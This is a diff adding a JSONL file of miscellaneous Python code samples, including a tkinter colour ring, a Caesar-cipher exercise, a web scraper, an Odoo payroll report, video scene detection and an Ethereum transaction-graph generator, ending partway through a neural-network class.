diff --git "a/2557.jsonl" "b/2557.jsonl" new file mode 100644--- /dev/null +++ "b/2557.jsonl" @@ -0,0 +1,459 @@ +{"seq_id":"248637880","text":"from tkinter import *\nimport circle\n\nW,H=(600,600)\n\ndef f2hex(x):\n return '{:02X}'.format(int(x*0xff))#0xff=252,'{:02X}'は二桁の整数の文字列\n\ndef string(r,g,b):\n return '#'+f2hex(r)+f2hex(g)+f2hex(b)\n\ndef color(n,i):\n oneSixth,twoSixth,threeSix,fourSix,fiveSix,six=(1.0/6.0,2.0/6.0,3.0/6.0,4.0/6.0,5.0/6.0,6.0)\n ratio=i/n\n if ratio <= oneSixth:\n return string(1.0,ratio*six,0.0)\n elif ratio <=twoSixth:\n return string((twoSixth-ratio)*six,1.0,0.0)\n elif ratio <=threeSix:\n return string(0.0,1.0,(ratio-twoSixth)*six)\n elif ratio <=fourSix:\n return string(0.0,(fourSix-ratio)*six,1.0)\n elif ratio <=fiveSix:\n return string((ratio-fourSix)*six,0.0,1.0)\n else:\n return string(1.0,0.0,(1.0-ratio)*six)\n\ndef display(canvas,points):\n for i in range(len(points)):\n j=(i+1)%len(points)\n canvas.create_line(points[i],points[j],fill=color(len(points),i))\n\n\ndef main():\n root = Tk()\n canvas=Canvas(root,width=W,height=H,bg='black')\n canvas.pack()\n points=circle.circle()\n display(canvas,points)\n root.mainloop()\n\nif __name__ == '__main__':\n main()","sub_path":"03/colorRingRGB.py","file_name":"colorRingRGB.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"363780948","text":"\"\"\"Shift encrypt names/strings from text file\nLet string A be the first 6 characters of your last-name\n(if your last-name is less than 6 characters,\nrepeat the last letter until you get a six-character string).\n\n(a) Encrypt string A using ROT3 cipher in the English alphabet.\n(b) Encrypt string A using One-Time-Pad cipher,\nwhere the key is 'SECRET'.\n\"\"\"\n\nfrom string import ascii_lowercase\n\nNAME_LENGTH = 6\nSHIFT_DISTANCE = 3\nINPUT_FILENAME = \"cp3404_names.txt\"\nOUTPUT_FILENAME = \"cp3404_cryptograms.txt\"\n\n\ndef main():\n \"\"\"Get names and encrypt them.\"\"\"\n names = get_names(INPUT_FILENAME)\n name_to_cryptogram = encrypt_names(names)\n save_results(name_to_cryptogram, OUTPUT_FILENAME)\n\n\ndef encrypt_names(names):\n name_to_cryptogram = {}\n for name in names:\n cryptogram = encrypt_name(name, SHIFT_DISTANCE)\n name_to_cryptogram[name] = cryptogram\n return name_to_cryptogram\n\n\ndef get_names(filename):\n \"\"\"Retrieve and process names from text file using minimum length and repeated characters to fill.\"\"\"\n names = []\n with open(filename) as input_file:\n lines = input_file.readlines()\n for line in lines:\n name = line.strip().lower().replace(' ', '').replace('-', '') # ward\n names.append(f\"{name[:6]:{name[-1]}<6}\") # warddd\n return names\n\n\ndef encrypt_name(name, distance):\n \"\"\"Use shift to encrypt one name.\"\"\"\n cryptogram = \"\"\n number_of_letters_in_alphabet = len(ascii_lowercase)\n for letter in name:\n index = ascii_lowercase.index(letter)\n new_index = (index + distance) % number_of_letters_in_alphabet\n cryptogram += ascii_lowercase[new_index]\n return cryptogram\n\n\ndef save_results(name_to_cryptogram, filename):\n with open(filename, 'w') as output_file:\n for name, cryptogram in name_to_cryptogram.items():\n print(f\"{name} => {cryptogram}\", file=output_file)\n\n\nmain()\n","sub_path":"encrypt_solutions.py","file_name":"encrypt_solutions.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"252350158","text":"from bs4 import BeautifulSoup\nimport pandas\nimport requests\n\ntitle_list = list()\nbroad_list = list()\ntype_list = list()\n\nfor page in range(1,5):\n url = \"http://ch.interest.me/tvn/Program?page=%s&onair=E&code=CAT008&order=\"%page\n temp = requests.get(url)\n temp.encoding = \"utf-8\"\n source_code = temp.text\n soup = BeautifulSoup(source_code, 'lxml')\n \n for link in soup.find_all('span',{'class':'title'}):\n link = link.text\n title_list.append(link)\n broad_list.append(\"tvN\")\n type_list.append(\"drama\")\n\n\n \ndrama_title = pandas.DataFrame({'Broadcaster' : broad_list,'title' : title_list,'type' : type_list})\nf=open(\"C:/Users/jaehyun/Crawling/drama_list/tvN.csv\",\"w\")\nf.write(pandas.DataFrame.to_csv(drama_title))\nf.close()","sub_path":"Web_Crawler/tvn_drama_list_crawler.py","file_name":"tvn_drama_list_crawler.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"18350977","text":"# This program is not working!!\n# Ref: [Youtube]('https://youtu.be/Xbl7XjFYsN4?t=748')\n\n\nimport time\nimport threading\nfrom typing import Mapping # Mapping did not work in vscode!!!\n# import typing\nclass Mayhem(threading.Thread):\n def __init__(self, map: Mapping[str, int]) -> None:\n super().__init__()\n self.map = map\n def run(self):\n for key, value in self.map.items():\n print(f'sleep value is {value}')\n time.sleep(value)\n \nd = {\"k1\": 1, \"k2\": 2, \"k3\": 3}\nm = Mayhem(d)\nm.start()\nd['k4'] = 4 # This is expected to throw an error, which it doesn't !!!\nprint(d)","sub_path":"asyncio/Lukasz/01_threading.py","file_name":"01_threading.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"267334523","text":"'''\npg 34\n'''\n# Prompt the user for a number with eval(input(\"whatever message you want string\"))\nradius = eval(input(\"Enter a value for radius: \"))\n\n# Compute area\narea = radius * radius * 3.14159\n\n# Display results\nprint(\"The area for the circle of radius\", radius, \"is\", area)","sub_path":"PythonLearn/ch_2/ConsoleInputTest.py","file_name":"ConsoleInputTest.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"132342674","text":"from PyQt5.QtWidgets import *\r\nfrom PyQt5.uic import loadUi\r\nimport sys\r\nfrom databaseinfo.dbconnection import DbConnection as db\r\nclass ModelTable(QFrame):\r\n def __init__(self):\r\n super().__init__()\r\n loadUi(\"Modeltable.ui\", self)\r\n self.con = db.createconnection()\r\n self.cursor = self.con.cursor()\r\n self.fillTable()\r\n def fillTable(self):\r\n strsql = \" select * from modeldetails \"\r\n self.cursor.execute(strsql)\r\n self.dataset=self.cursor.fetchall()\r\n print(self.dataset)\r\n rowcnt = len(self.dataset)\r\n print(rowcnt)\r\n self.tbl.setRowCount(rowcnt)\r\n rownum = 0\r\n for row in self.dataset:\r\n for column in range(len(row)):\r\n print(row[column])\r\n self.tbl.setItem(rownum, column, QTableWidgetItem(str(row[column])))\r\n rownum = rownum + 1\r\ndef main():\r\n app = QApplication(sys.argv)\r\n enq = ModelTable()\r\n enq.show()\r\n app.exec_()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"gui/Modeltable.py","file_name":"Modeltable.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"465327921","text":"def linear(x, a, k):\n return a*x + k\n\nimport math # type: ignore\nimport numpy as np # type: ignore\nimport matplotlib.pyplot as plt # type: ignore\nimport scipy as scipy\nfrom scipy import optimize\n###############################\nNVE_start = 10000\n\ndt_NVT = (2.5E-15)*1.0E12 # Timestep in NVT in ps\ndt_NVE = (10.0E-15)*1.0E12 # Timestep in NVE in ps\ndata1 = np.loadtxt('Temp_Ar.txt') # NVT Temp\n\ndata2 = np.arange(data1.shape[0])\ndata2 = data2*dt_NVE # Time in NVT\n\n# Plot NVE temperature\nplt.figure(figsize=(15,8))\nplt.plot(data2,data1, 'k')\nplt.xlabel('time (ps)')\nplt.ylabel('Temperature (K)')\n#plt.axis([0, 100, 86, 100])\nplt.plot([0, 100], [np.mean(data1[NVE_start+1:100000]),np.mean(data1[NVE_start+1:100000])], 'r')\nplt.plot([0, 100], [94.4, 94.4], '--r')\nplt.show()\nprint(np.mean(data1[0:NVE_start]))\nprint(np.mean(data1[NVE_start+1:100000]))\n\n# Plot 100 time step moving average of Temp\n\ntemp_binned = np.zeros(data1.shape[0])\nfor i in range(100,data1.shape[0]):\n temp_binned[i] = np.mean(data1[i-100:i])\n\nplt.figure(figsize=(15,8))\nplt.plot(data2[100:data1.shape[0]-1], temp_binned[100:data1.shape[0]-1])\nprint(np.mean(temp_binned[100:data1.shape[0]-1]))\n#plt.axis([0, 500, 86, 100])\nplt.xlabel('time (ps)')\nplt.ylabel('Temperature (K)')\nplt.show()\n\ntemp_binned = np.zeros(int(data1.shape[0]/100))\nfor i in range(1,temp_binned.shape[0]):\n temp_binned[i] = np.mean(data1[(i-1)*100+1:(i*100)])\ntemp_binned[0] = temp_binned[1]\nplt.plot(temp_binned)\nprint(np.mean(temp_binned))\n#plt.axis([0, 500, 86, 100])\nplt.xlabel('time (ps)')\nplt.ylabel('Temperature (K)')\nplt.show()\nprint(temp_binned.shape[0])\nnp.mean(data1[i-100:i])\ndata2 = np.arange(temp_binned.shape[0])\npopt_linear, pcov_linear = scipy.optimize.curve_fit(linear, data2[500:1000],temp_binned[500:1000], p0=[1,0])\nperr_linear = np.sqrt(np.diag(pcov_linear))\nprint(\"slope = %0.2f (+/-) %0.2f\" % (popt_linear[0], perr_linear[0]))\nprint(\"intercept= %0.2f (+/-) %0.2f\" % (popt_linear[1], perr_linear[1]))","sub_path":"test_plots.py","file_name":"test_plots.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"398728838","text":"import json\nimport os\nimport errno\n\n\ndef read_json_data_file(type,value):\n cwd = os.getcwd()\n pcwd = \"\\\\\".join(cwd.split('\\\\')[:-1])\n confdir = cwd + \"\\\\config\"\n try:\n dirExists = os.path.exists(confdir)\n if not dirExists:\n confdir = pcwd + \"\\\\config\"\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n\n json_data = open(confdir+\"\\\\config.json\")\n data = json.load(json_data)\n try:\n return data[type][value]\n except:\n return None\n","sub_path":"utils/config_reader.py","file_name":"config_reader.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"60466052","text":"# -*- encoding: utf-8 -*-\n\nfrom odoo import api, models, fields\nimport time\nimport datetime\nfrom datetime import date\nfrom datetime import datetime, date, time\nimport logging\n\nclass ReportLibroSalarios(models.AbstractModel):\n _name = 'report.rrhh.libro_salarios'\n\n def _get_contrato(self,id):\n contrato_id = self.env['hr.contract'].search([['employee_id', '=', id]])\n return {'fecha_ingreso':contrato_id.date_start,'fecha_finalizacion': contrato_id.date_end}\n\n def _get_empleado(self,id):\n empleado_id = self.env['hr.employee'].search([['id', '=', id]])\n empleado = 0\n if empleado_id:\n empleado = empleado_id\n else:\n empleado_id = self.env['hr.employee'].search([['id', '=', id],['active', '=', False]])\n empleado = empleado_id\n return empleado\n\n def _get_nominas(self,id,anio):\n nomina_id = self.env['hr.payslip'].search([['employee_id', '=', id]],order=\"date_from asc\")\n nominas_lista = []\n for nomina in nomina_id:\n nomina_anio = datetime.strptime(nomina.date_from, \"%Y-%m-%d\").year\n if anio == nomina_anio:\n salario = 0\n dias_trabajados = 0\n ordinarias = 0\n extra_ordinarias = 0\n ordinario = 0\n extra_ordinario = 0\n igss = 0\n isr = 0\n anticipos = 0\n bonificacion = 0\n bono = 0\n aguinaldo = 0\n indemnizacion = 0\n septimos_asuetos = 0\n vacaciones = 0\n decreto = 0\n fija = 0\n variable = 0\n otras_deducciones = 0\n for linea in nomina.line_ids:\n if linea.salary_rule_id in nomina.company_id.salario_ids:\n salario += linea.total\n if linea.salary_rule_id in nomina.company_id.ordinarias_ids:\n ordinarias += linea.total\n if linea.salary_rule_id in nomina.company_id.extras_ordinarias_ids:\n extra_ordinarias += linea.total\n if linea.salary_rule_id in nomina.company_id.ordinario_ids:\n ordinario += linea.total\n if linea.salary_rule_id in nomina.company_id.extra_ordinario_ids:\n extra_ordinario += linea.total\n if linea.salary_rule_id in nomina.company_id.igss_ids:\n igss += linea.total\n if linea.salary_rule_id in nomina.company_id.isr_ids:\n isr += linea.total\n otras_deducciones += isr\n if linea.salary_rule_id in nomina.company_id.anticipos_ids:\n anticipos += linea.total\n otras_deducciones += anticipos\n if linea.salary_rule_id in nomina.company_id.bonificacion_ids:\n bonificacion += linea.total\n if linea.salary_rule_id in nomina.company_id.bono_ids:\n bono += linea.total\n if linea.salary_rule_id in nomina.company_id.aguinaldo_ids:\n aguinaldo += linea.total\n if linea.salary_rule_id in nomina.company_id.indemnizacion_ids:\n indemnizacion += linea.total\n if linea.salary_rule_id in nomina.company_id.septimos_asuetos_ids:\n septimos_asuetos += linea.total\n if linea.salary_rule_id in nomina.company_id.vacaciones_ids:\n vacaciones += linea.total\n if linea.salary_rule_id in nomina.company_id.decreto_ids:\n decreto += linea.total\n if linea.salary_rule_id in nomina.company_id.fija_ids:\n fija += linea.total\n if linea.salary_rule_id in nomina.company_id.variable_ids:\n variable += linea.total\n for linea in nomina.worked_days_line_ids:\n dias_trabajados += linea.number_of_days\n total_salario_devengado = ordinarias + extra_ordinarias + ordinario + extra_ordinario + septimos_asuetos + vacaciones\n # total_descuentos = igss + isr + anticipos\n total_deducciones = igss + otras_deducciones\n bono_agui_indem = bono + aguinaldo + indemnizacion\n nominas_lista.append({\n 'orden': nomina.name,\n 'fecha_inicio': nomina.date_from,\n 'fecha_fin': nomina.date_to,\n 'moneda_id': nomina.company_id.currency_id,\n 'salario': salario,\n 'dias_trabajados': dias_trabajados,\n 'ordinarias': ordinarias,\n 'extra_ordinarias': extra_ordinarias,\n 'ordinario': ordinario,\n 'extra_ordinario': extra_ordinario,\n 'septimos_asuetos': septimos_asuetos,\n 'vacaciones': vacaciones,\n 'total_salario_devengado': total_salario_devengado,\n 'igss': igss,\n 'isr': isr,\n 'anticipos': anticipos,\n 'otras_deducciones': otras_deducciones,\n 'total_deducciones': total_deducciones,\n 'bonificacion_id': bonificacion,\n 'decreto': decreto,\n 'fija': fija,\n 'variable': variable,\n 'bono_agui_indem': bono_agui_indem,\n 'liquido_recibir': total_salario_devengado + total_deducciones + bonificacion + bono_agui_indem + decreto + fija + variable\n })\n return nominas_lista\n\n @api.model\n def get_report_values(self, docids, data=None):\n data = data if data is not None else {}\n self.model = 'hr.employee'\n docs = data.get('ids', data.get('active_ids'))\n anio = data.get('form', {}).get('anio', False)\n return {\n 'doc_ids': docids,\n 'doc_model': self.model,\n 'docs': docs,\n 'anio': anio,\n '_get_empleado': self._get_empleado,\n '_get_contrato': self._get_contrato,\n '_get_nominas': self._get_nominas,\n }\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"rrhh/report/libro_salarios.py","file_name":"libro_salarios.py","file_ext":"py","file_size_in_byte":6515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"92117132","text":"import os\n\nimport dj_database_url\nimport environ\n\nfrom project.settings import BASE_DIR\n\nenv = environ.Env(DEBUG=(bool, False))\n\n\ndef optenv(var):\n return env(var, default=None)\n\n\nenv.read_env(os.path.join(BASE_DIR, '.env'))\n\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, \"media\")\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\nDATABASES = {'default': dj_database_url.config(default=env('DATABASE_URL_DEV', default=''))}\n\nDEV_APPS = [\n \"debug_toolbar\"\n]\n\nDEV_MIDDLEWARE = [\n \"debug_toolbar.middleware.DebugToolbarMiddleware\",\n]\n\nINTERNAL_IPS = [\n '127.0.0.1',\n]","sub_path":"project/settings/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"320042638","text":"import os\nimport numpy as np\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\nimport pandas as pd\n\ndef plot_many_imgs(imgs, titles=None):\n \n n = len(imgs)\n if n > 80:\n print(f\"Images of len {n} restricted to 80\")\n n = 80\n \n if titles is None:\n titles = list(range(n))\n\n fig, ax = plt.subplots(nrows=n, ncols=1, figsize=(6, n*3))\n\n for _i, (_img, _title) in enumerate(zip(imgs, titles)):\n \n ax[_i].imshow(_img)\n ax[_i].axis('off') \n ax[_i].title.set_text(str(_title))\n \n \ndef load_many_imgs(d, N=10):\n \n sel_fns = np.random.choice(os.listdir(d),size=N).tolist()\n sel_fns = [d / e for e in sel_fns]\n\n imgs = []\n for f in sel_fns:\n imgs.append(np.array(Image.open(f)))\n\n print(f\"loaded {len(imgs)} images\")\n return imgs\n\nclass ScreePlot:\n \n def __init__(self):\n self.values = None\n\n def save(self, learn):\n self.values = pd.DataFrame(learn.recorder.values.copy())\n\n def scree(self, learn):\n \n valid_df = pd.DataFrame(learn.recorder.values)\n test_df = pd.DataFrame(learn.cbs[3].values)\n\n if self.values is not None:\n valid_df = pd.concat((self.values, valid_df))\n valid_df.reset_index()\n\n def foo(cv, ct):\n plt.plot(valid_df.iloc[:,cv], label='valid')\n plt.plot((test_df.iloc[:,ct]),label='test' )\n \n foo(cv=2,ct=1)\n plt.ylim(0,1)\n plt.legend()\n plt.title('acc')\n plt.show()\n \n foo(cv=1,ct=0)\n plt.legend()\n plt.title('loss')\n plt.ylim(0,3)\n plt.show()\n \n","sub_path":"chess-classification-hw/modules/plotutils.py","file_name":"plotutils.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"434716511","text":"import pylab\nimport imageio\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.misc\nimport MPI\nimport workspace_frame_loss\nimport pprint\n\ndef display(frame, frame_n=None):\n fig = pylab.figure()\n if frame_n is not None:\n fig.suptitle('Frame #' + str(frame_n), fontsize=20)\n pylab.imshow(frame, cmap='gray')\n pylab.show()\n\ndef load_video(path):\n return imageio.get_reader(path, 'ffmpeg')\n\ndef dropped_frames(video, proportion):\n # Can't read last frame. Bug?\n for frame_n in range(0, video.get_length() - 100, int(1 / proportion)):\n yield video.get_data(frame_n)\n\ndef get_timecode(frame_n, video):\n fps = video._meta['fps']\n sec = int(frame_n // fps)\n return '{0:02d}:{1:02d}:{2:02d}'.format(\n sec // 3600,\n sec // 60 % 60,\n sec // 1 % 60\n )\n\ndef downsample(frame, proportion):\n return scipy.misc.imresize(frame, size=proportion)\n\n\n# video = load_video('/Users/colinni/Documents/breaking_bad_ozymandias_downsampled.mp4')\n#\n# cuts, MPIs = MPI.get_cuts(dropped_frames(video, proportion=1.0))\n#\n# figure = plt.figure(figsize=(16, 6))\n# plt.plot(MPIs)\n#\n# for frame_n in cuts:\n# plt.axvline(x=frame_n, color='g')\n#\n# timecodes = [get_timecode(frame_n, video) for frame_n in cuts]\n# plt.xticks(cuts, timecodes, size='small', rotation='vertical')\n#\n# # plt.xlim(8000, 12000)\n# plt.subplots_adjust(bottom=0.15, left=0.05, right=0.95, top=0.95)\n# plt.xlabel('Cut timecodes')\n# plt.ylabel('MPI')\n# plt.title('Cuts detected using MPI\\'s')\n# plt.show()\n\nvideo = load_video('/Users/colinni/Documents/breaking_bad_ozymandias_downsampled.mp4')\n\n\nfor frame_n in [11000, 12000, 13000, 1023, 1234, 7543, 4532, 2341]:\n print(\n workspace_frame_loss.workspace_get_loss_brute(\n video.get_data(frame_n),\n video.get_data(frame_n + 1),\n pool_radius=20,\n metric='linear',\n n_colors=3\n )\n )\n print(\n workspace_frame_loss.workspace_get_loss(\n video.get_data(frame_n),\n video.get_data(frame_n + 1),\n pool_radius=20,\n metric='linear',\n n_colors=3\n )\n )\n print()\n# 0 0 465 279 998 15 0 926\n\nstart_frame, end_frame, proportion = 7700, 9500, 0.25\nframe_ns = range(start_frame, end_frame, int(1 / proportion))\n\nframes_a = (video.get_data(frame_n) for frame_n in frame_ns)\nframes_b = (video.get_data(frame_n) for frame_n in frame_ns)\nnext(frames_b)\n\nlosses = []\nfor frame_n, (frame_base, frame_moved) in enumerate(zip(frames_a, frames_b)):\n print(frame_n)\n losses.append(\n workspace_frame_loss.workspace_get_loss_mean_test_alg(\n frame_base,\n frame_moved,\n pool_radius=50,\n\n n_colors=3\n )\n )\n # losses.append(frame_loss.test_base_iteration_speed(frame_base))\n\ndelta_losses = [\n abs(loss_a - loss_b) for loss_a, loss_b in zip(losses[:-1], losses[1:])\n]\n\nfigure = plt.figure(figsize=(16, 6))\nplt.plot(delta_losses)\n\ntimecode_frame_ns = range(start_frame, end_frame, int((end_frame - start_frame) / 32))\ntimecodes = [get_timecode(frame_n, video) for frame_n in timecode_frame_ns]\nplt.xticks(\n [(len(losses) * i / 32) for i in range(32)],\n timecodes,\n size='small',\n rotation='vertical'\n)\n\nplt.subplots_adjust(bottom=0.15, left=0.05, right=0.95, top=0.95)\nplt.xlabel('Frame number')\nplt.ylabel('loss')\nplt.show()\n\n# bench: 72s, pool_radius=50, metric='binary', n_colors=3, frames 7700-7800, prop=1.0\n","sub_path":"workspace_scene_detect.py","file_name":"workspace_scene_detect.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"218524353","text":"from web3.auto.infura import w3\nimport json\nimport sys\nimport requests\nimport argparse\nfrom requests.exceptions import HTTPError\nimport eth_utils\n\nfrom datetime import datetime\n\nfrom transaction import Transaction\nimport constant\n\nGET_ACCOUNT_NORMAL_TRANSACTION_URL = 'http://api.etherscan.io/api?module=account&action=txlist&address={}&startblock={}&endblock=99999999&sort=asc'\nETHERSCAN_URL = 'http://etherscan.io/address/{}'\n\nWEI = 1000000000000000000\nEXCHANGE_LIST = list(constant.EXCHANGE_ADDRESS_DICT.keys())\nSUSPICIOUS_LIST = list(constant.SUSPICIOUS_ADDRESS_DICT.keys())\n\ntotal_address_set = set()\ntotal_transaction_set = set()\n\ndef get_ether_transaction(account, internal, startBlock, endBlock):\n try:\n response = requests.get(GET_ACCOUNT_NORMAL_TRANSACTION_URL.format(account, startBlock, endBlock))\n response.raise_for_status()\n\n except HTTPError as http_err:\n print(f'HTTP error occurred: {http_err}') \n sys.exit(0)\n except Exception as err:\n print(f'Other error occurred: {err}')\n sys.exit(0)\n else:\n json_res = json.loads(response.text)\n res_set = set()\n address_set = set()\n\n if not json_res['result']:\n print(f'{account} has no transactions')\n return res_set\n else:\n\n for transaction in json_res['result']:\n if(not transaction['contractAddress'] and transaction['isError'] == '0' and transaction['input'] == '0x'):\n\n if(transaction['from'] != transaction['to']):\n\n if internal:\n transaction_object = Transaction(transaction['from'], transaction['to'], transaction['value'], \n transaction['gas'], transaction['gasPrice'], transaction['hash'])\n\n if transaction['from'] not in EXCHANGE_LIST:\n address_set.add(transaction['from'])\n if transaction['to'] not in EXCHANGE_LIST:\n address_set.add(transaction['to'])\n if transaction['from'] not in EXCHANGE_LIST and transaction['to'] not in EXCHANGE_LIST:\n res_set.add(transaction_object);\n else:\n if predicate_internal_transaction(transaction['to']) and predicate_internal_transaction(transaction['from']):\n transaction_object = Transaction(transaction['from'], transaction['to'], transaction['value'], \n transaction['gas'], transaction['gasPrice'], transaction['hash'])\n\n if transaction['from'] not in EXCHANGE_LIST:\n address_set.add(transaction['from'])\n if transaction['to'] not in EXCHANGE_LIST:\n address_set.add(transaction['to'])\n if transaction['from'] not in EXCHANGE_LIST and transaction['to'] not in EXCHANGE_LIST:\n res_set.add(transaction_object);\n \n print (f'Get all transactions for {account}')\n return (res_set, address_set)\n\n\ndef predicate_internal_transaction(account):\n return (w3.eth.getCode(w3.toChecksumAddress(account))) == b''\n \n\ndef get_multiple_layers_ether_transaction(account, layer, internal, startBlock = 0 , endBlock = 999999999):\n total_address_set.add(account)\n\n current_transaction_set, current_address_set = get_ether_transaction(account, internal, startBlock, endBlock)\n total_transaction_set.update(current_transaction_set)\n \n # BFS\n for i in range(1, layer):\n current_layer_address_set = current_address_set - total_address_set\n total_address_set.update(current_address_set)\n\n for address in current_layer_address_set:\n temp_transaction_set, temp_address_set = get_ether_transaction(address, internal, startBlock, endBlock)\n current_address_set.update(temp_address_set)\n total_transaction_set.update(temp_transaction_set)\n\n total_address_set.update(current_address_set)\n\n\ndef generate_edgelist(nickname):\n total_address_list = list(total_address_set)\n f1 = open(f\"data/{nickname}.edgelist\",\"w+\")\n\n for transaction in total_transaction_set:\n gas_total = int(transaction.value)/WEI + int(transaction.gas)/WEI * int(transaction.gasPrice)/WEI\n f1.write(str(total_address_list.index(transaction.fromAddress)) + '\\t' + str(total_address_list.index(transaction.toAddress)) + '\\t' \n + str(gas_total) + '\\n')\n f1.close\n\n f2 = open(f\"data/{nickname}_address.txt\",\"w+\")\n\n for address in total_address_set:\n if address in EXCHANGE_LIST:\n f2.write(address + \"(\" + constant.EXCHANGE_ADDRESS_DICT[address] + \")\" + '\\t' + str(total_address_list.index(address)) + \"\\n\")\n elif address in SUSPICIOUS_LIST:\n f2.write(address + \"(\" + constant.SUSPICIOUS_ADDRESS_DICT[address] + \")\" + '\\t' + str(total_address_list.index(address)) + \"\\n\")\n else:\n f2.write(address + '\\t' + str(total_address_list.index(address)) + \"\\n\")\n f2.close\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Ethereum network graph generater')\n parser.add_argument('address', nargs=1, help='the address that want to investigate')\n parser.add_argument('layer', nargs=1, type=int, help='the number of layer that the address search, 1 layer means just searching neighbours')\n parser.add_argument('-n', '--n', nargs=1, help='the nickname of the address')\n parser.add_argument('-internal', '--internal', action='store_true', help='include internal transaction')\n args = parser.parse_args()\n\n address = args.address[0]\n layer = args.layer[0]\n nickname = \"\"\n internal = False\n\n if not eth_utils.is_hex_address(address):\n print (f'{address} is not a valid address')\n sys.exit(0)\n if not args.n:\n dateTimeObj = datetime.now()\n nickname = dateTimeObj.strftime(\"%d-%m-%Y-%H:%M:%S\")\n if args.internal:\n internal = True\n if args.n:\n nickname = args.n[0]\n \n get_multiple_layers_ether_transaction(eth_utils.to_normalized_address(address), layer, internal)\n generate_edgelist(nickname)\n","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"194035032","text":"import os\nimport datetime\nimport glob\n\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud, STOPWORDS \n\ndef delete_all_files_in_image():\n \"\"\" \n Deletes all files in image directory \n \"\"\"\n \n [os.remove(file) for file in glob.glob(os.path.join(os.getcwd(),\"src/static/images/\",\"*.png\"))]\n\ndef get_filename(name):\n \"\"\"\n Generated imagename and filename\n Parameters: \n name: Suggested name ( type of plot) to add to image name\n Returns: \n str : imagecname and file name \"\"\"\n \n image_name='{}_{}_plot.png'.format(datetime.datetime.now().strftime(\"%Y-%m-%d\"),name)\n file_name = os.path.join(os.path.sep,os.getcwd(),\"src\",\"static\",\"images\",image_name)\n\n return image_name,file_name\n \n \n\ndef generate_barplot(df,name,xlabel,ylabel,rot_val=0): \n \"\"\"\n Generated bar plot \n Parameters: \n dataframe , name , labels and label rotation\n Returns: \n Saves the plot as image\"\"\"\n\n image_name,file_name=get_filename(name)\n \n plt.figure()\n df.T.plot(kind='bar',rot=rot_val)\n plt.ylabel(ylabel)\n plt.xlabel(xlabel)\n plt.savefig(file_name, format='png')\n plt.close()\n \n\n return image_name\n\ndef generate_histplot(df,name,xlabel,ylabel,col1,col2):\n \"\"\"\n Generated histogram plot \n Parameters: \n dataframe , name , labels and label rotation\n Returns: \n Saves the plot as image\"\"\"\n\n image_name,file_name=get_filename(name)\n plt.figure()\n df.plot.bar(x=col1, y=col2)\n plt.ylabel(ylabel)\n plt.xlabel(xlabel)\n plt.savefig(file_name, format='png')\n plt.close()\n\n return image_name\n\n\ndef generate_word_cloud(df,name):\n\n \"\"\"\n Removes stopwords, tokenizes the lyrics and generated a word cloud \n Parameters: \n dataframe , name for the file\n Returns: \n Saves the plot as image\"\"\"\n \n lyrics_words = ' '\n stopwords = set(STOPWORDS) \n \n # iterate through the csv file \n for val in df.LyricsList: \n \n # typecaste each val to string \n val = str(val) \n \n # split the value \n tokens = val.split() \n \n # Converts each token into lowercase \n for i in range(len(tokens)): \n tokens[i] = tokens[i].lower() \n \n for words in tokens: \n lyrics_words = lyrics_words + words + ' '\n \n \n wordcloud = WordCloud(width = 800, height = 800, \n background_color ='white', \n stopwords = stopwords, \n min_font_size = 10).generate(lyrics_words) \n \n # plot the WordCloud image \n plt.figure(figsize = (8, 8), facecolor = None) \n plt.imshow(wordcloud) \n plt.axis(\"off\") \n plt.tight_layout(pad = 0) \n \n image_name,file_name=get_filename(name)\n plt.savefig(file_name, format='png')\n f = plt.figure()\n f.clear()\n plt.clf()\n plt.close(f) \n \n \n return image_name","sub_path":"src/helper/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"416772985","text":"import math\nimport random as r\n\nclass Neuron:\n\tdef __init__(self, name, numInputs, numOutputs, learnRate):\n\t\tself.name = name\n\t\tself.weights \t\t\t= []\n\t\tself.bias \t\t\t= r.random()\n\t\t#self.bias \t\t= 0.5\n\t\tself.learnRate \t\t= learnRate\n\t\tself.newWeights = []\n\t\tself.delta \t\t\t\t= 